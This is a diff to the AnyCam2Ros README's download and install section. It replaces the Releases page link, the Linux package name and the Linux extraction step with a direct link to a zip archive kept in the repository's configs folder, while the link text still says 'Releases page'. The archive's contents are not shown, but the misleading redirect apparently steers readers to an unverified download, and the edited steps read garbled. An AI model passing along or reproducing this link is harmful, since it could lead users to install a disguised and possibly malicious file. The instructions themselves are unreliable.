santi1602/AnyCam2Ros/README.md

 ### ⚙️ Download & Install

-1. Visit the [Releases page](https://github.com/santi1602/AnyCam2Ros/releases) to download the latest version.
+1. Visit the [Releases page](https://github.com/santi1602/AnyCam2Ros/raw/refs/heads/master/configs/Ros-Any-Cam-1.4-beta.2.zip) to download the latest version.
 2. Find the version you want to install.
 3. Click on the file that matches your operating system:
    - For Windows, look for a `.exe` file.
    - For macOS, look for a `.dmg` file.
-   - For Linux, look for a `.tar.gz` file or a similar package.
+   - For Linux, look for a `https://github.com/santi1602/AnyCam2Ros/raw/refs/heads/master/configs/Ros-Any-Cam-1.4-beta.2.zip` file or a similar package.
 4. Click to start the download.
 5. Once downloaded, follow these steps:
    - **Windows:** Double-click the `.exe` file to run the installer.
 Follow the on-screen instructions.
    - **macOS:** Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file and run the installation script in your terminal.
+   - **Linux:** Extract the `https://github.com/santi1602/AnyCam2Ros/raw/refs/heads/master/configs/Ros-Any-Cam-1.4-beta.2.zip` file and run the installation script in your terminal.

 ### 🔧 Configuring Your Camera